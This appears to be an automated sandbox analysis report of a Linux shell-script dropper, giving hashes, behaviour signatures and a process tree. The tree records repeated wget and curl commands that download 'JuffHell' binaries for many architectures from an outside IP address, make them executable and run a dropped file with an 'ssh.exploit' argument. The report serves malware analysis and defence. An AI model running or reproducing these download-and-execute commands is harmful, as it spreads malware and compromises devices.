Analysis

  • max time kernel
    33s
  • max time network
    34s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    14-10-2024 14:51

General

  • Target

    30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh

  • Size

    3KB

  • MD5

    4de883db50a87d2eaf32038a6f48a3cf

  • SHA1

    5d786ee84056677315f5eb9315f7a40d7fe8cb94

  • SHA256

    30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55

  • SHA512

    36bee2e2e6850fd3fb99fe832fb3de0f4792ac2b6fc7dc24987f4efb53ab8e747e6ace4d518ac3e2efa62cf997e787be7107b28a2cf305b0f7d13bbace13631d

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 13 IoCs
  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 14 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
    /tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
    1⤵
    • Writes file to tmp directory
    PID:706
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.x86
      2⤵
        PID:711
      • /usr/bin/curl
        curl -O http://194.15.36.34/xxx9/JuffHell.x86
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:726
      • /bin/cat
        cat JuffHell.x86
        2⤵
          PID:732
        • /bin/chmod
          chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
          2⤵
          • File and Directory Permissions Modification
          PID:734
        • /tmp/dayum0x1a5sfd15as1fa
          ./dayum0x1a5sfd15as1fa ssh.exploit
          2⤵
          • Executes dropped EXE
          PID:735
        • /usr/bin/wget
          wget http://194.15.36.34/xxx9/JuffHell.mips
          2⤵
          • System Network Configuration Discovery
          PID:736
        • /usr/bin/curl
          curl -O http://194.15.36.34/xxx9/JuffHell.mips
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:738
        • /bin/cat
          cat JuffHell.mips
          2⤵
          • System Network Configuration Discovery
          PID:739
        • /bin/chmod
          chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
          2⤵
          • File and Directory Permissions Modification
          PID:740
        • /tmp/dayum0x1a5sfd15as1fa
          ./dayum0x1a5sfd15as1fa ssh.exploit
          2⤵
          • Executes dropped EXE
          PID:741
        • /usr/bin/wget
          wget http://194.15.36.34/xxx9/JuffHell.mpsl
          2⤵
            PID:742
          • /usr/bin/curl
            curl -O http://194.15.36.34/xxx9/JuffHell.mpsl
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:743
          • /bin/cat
            cat JuffHell.mpsl
            2⤵
              PID:744
            • /bin/chmod
              chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
              2⤵
              • File and Directory Permissions Modification
              PID:745
            • /tmp/dayum0x1a5sfd15as1fa
              ./dayum0x1a5sfd15as1fa ssh.exploit
              2⤵
              • Executes dropped EXE
              PID:747
            • /usr/bin/wget
              wget http://194.15.36.34/xxx9/JuffHell.arm
              2⤵
                PID:749
              • /usr/bin/curl
                curl -O http://194.15.36.34/xxx9/JuffHell.arm
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:757
              • /bin/cat
                cat JuffHell.arm
                2⤵
                  PID:763
                • /bin/chmod
                  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
                  2⤵
                  • File and Directory Permissions Modification
                  PID:765
                • /tmp/dayum0x1a5sfd15as1fa
                  ./dayum0x1a5sfd15as1fa ssh.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:767
                • /usr/bin/wget
                  wget http://194.15.36.34/xxx9/JuffHell.arm5
                  2⤵
                    PID:768
                  • /usr/bin/curl
                    curl -O http://194.15.36.34/xxx9/JuffHell.arm5
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:777
                  • /bin/cat
                    cat JuffHell.arm5
                    2⤵
                      PID:782
                    • /bin/chmod
                      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
                      2⤵
                      • File and Directory Permissions Modification
                      PID:784
                    • /tmp/dayum0x1a5sfd15as1fa
                      ./dayum0x1a5sfd15as1fa ssh.exploit
                      2⤵
                      • Executes dropped EXE
                      PID:785
                    • /usr/bin/wget
                      wget http://194.15.36.34/xxx9/JuffHell.arm6
                      2⤵
                        PID:788
                      • /usr/bin/curl
                        curl -O http://194.15.36.34/xxx9/JuffHell.arm6
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:833
                      • /bin/cat
                        cat JuffHell.arm6
                        2⤵
                          PID:834
                        • /bin/chmod
                          chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
                          2⤵
                          • File and Directory Permissions Modification
                          PID:835
                        • /tmp/dayum0x1a5sfd15as1fa
                          ./dayum0x1a5sfd15as1fa ssh.exploit
                          2⤵
                          • Executes dropped EXE
                          PID:836
                        • /usr/bin/wget
                          wget http://194.15.36.34/xxx9/JuffHell.arm7
                          2⤵
                            PID:837
                          • /usr/bin/curl
                            curl -O http://194.15.36.34/xxx9/JuffHell.arm7
                            2⤵
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:838
                          • /bin/cat
                            cat JuffHell.arm7
                            2⤵
                              PID:839
                            • /bin/chmod
                              chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
                              2⤵
                              • File and Directory Permissions Modification
                              PID:840
                            • /tmp/dayum0x1a5sfd15as1fa
                              ./dayum0x1a5sfd15as1fa ssh.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:841
                            • /usr/bin/wget
                              wget http://194.15.36.34/xxx9/JuffHell.ppc
                              2⤵
                                PID:842
                              • /usr/bin/curl
                                curl -O http://194.15.36.34/xxx9/JuffHell.ppc
                                2⤵
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:843
                              • /bin/cat
                                cat JuffHell.ppc
                                2⤵
                                  PID:844
                                • /bin/chmod
                                  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:845
                                • /tmp/dayum0x1a5sfd15as1fa
                                  ./dayum0x1a5sfd15as1fa ssh.exploit
                                  2⤵
                                  • Executes dropped EXE
                                  PID:846
                                • /usr/bin/wget
                                  wget http://194.15.36.34/xxx9/JuffHell.m68k
                                  2⤵
                                    PID:847
                                  • /usr/bin/curl
                                    curl -O http://194.15.36.34/xxx9/JuffHell.m68k
                                    2⤵
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:848
                                  • /bin/cat
                                    cat JuffHell.m68k
                                    2⤵
                                      PID:849
                                    • /bin/chmod
                                      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:850
                                    • /tmp/dayum0x1a5sfd15as1fa
                                      ./dayum0x1a5sfd15as1fa ssh.exploit
                                      2⤵
                                      • Executes dropped EXE
                                      PID:851
                                    • /usr/bin/wget
                                      wget http://194.15.36.34/xxx9/JuffHell.spc
                                      2⤵
                                        PID:852
                                      • /usr/bin/curl
                                        curl -O http://194.15.36.34/xxx9/JuffHell.spc
                                        2⤵
                                        • Reads runtime system information
                                        • Writes file to tmp directory
                                        PID:853
                                      • /bin/cat
                                        cat JuffHell.spc
                                        2⤵
                                          PID:854
                                        • /bin/chmod
                                          chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:855
                                        • /tmp/dayum0x1a5sfd15as1fa
                                          ./dayum0x1a5sfd15as1fa ssh.exploit
                                          2⤵
                                          • Executes dropped EXE
                                          PID:856
                                        • /usr/bin/wget
                                          wget http://194.15.36.34/xxx9/JuffHell.i686
                                          2⤵
                                            PID:857
                                          • /usr/bin/curl
                                            curl -O http://194.15.36.34/xxx9/JuffHell.i686
                                            2⤵
                                            • Reads runtime system information
                                            • Writes file to tmp directory
                                            PID:858
                                          • /bin/cat
                                            cat JuffHell.i686
                                            2⤵
                                              PID:862
                                            • /bin/chmod
                                              chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:863
                                            • /tmp/dayum0x1a5sfd15as1fa
                                              ./dayum0x1a5sfd15as1fa ssh.exploit
                                              2⤵
                                              • Executes dropped EXE
                                              PID:864
                                            • /usr/bin/wget
                                              wget http://194.15.36.34/xxx9/JuffHell.sh4
                                              2⤵
                                                PID:865
                                              • /usr/bin/curl
                                                curl -O http://194.15.36.34/xxx9/JuffHell.sh4
                                                2⤵
                                                • Reads runtime system information
                                                • Writes file to tmp directory
                                                PID:866
                                              • /bin/cat
                                                cat JuffHell.sh4
                                                2⤵
                                                  PID:867
                                                • /bin/chmod
                                                  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:868
                                                • /tmp/dayum0x1a5sfd15as1fa
                                                  ./dayum0x1a5sfd15as1fa ssh.exploit
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:869
                                                • /usr/bin/wget
                                                  wget http://194.15.36.34/xxx9/JuffHell.arc
                                                  2⤵
                                                    PID:870
                                                  • /usr/bin/curl
                                                    curl -O http://194.15.36.34/xxx9/JuffHell.arc
                                                    2⤵
                                                    • Reads runtime system information
                                                    • Writes file to tmp directory
                                                    PID:871
                                                  • /bin/cat
                                                    cat JuffHell.arc
                                                    2⤵
                                                      PID:872
                                                    • /bin/chmod
                                                      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arc JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:873
                                                    • /tmp/dayum0x1a5sfd15as1fa
                                                      ./dayum0x1a5sfd15as1fa ssh.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:874

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • /tmp/JuffHell.x86

                                                    Filesize

                                                    162B

                                                    MD5

                                                    4f8e702cc244ec5d4de32740c0ecbd97

                                                    SHA1

                                                    3adb1f02d5b6054de0046e367c1d687b6cdf7aff

                                                    SHA256

                                                    9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a

                                                    SHA512

                                                    21047fea5269fee75a2a187aa09316519e35068cb2f2f76cfaf371e5224445e9d5c98497bd76fb9608d2b73e9dac1a3f5bfadfdc4623c479d53ecf93d81d3c9f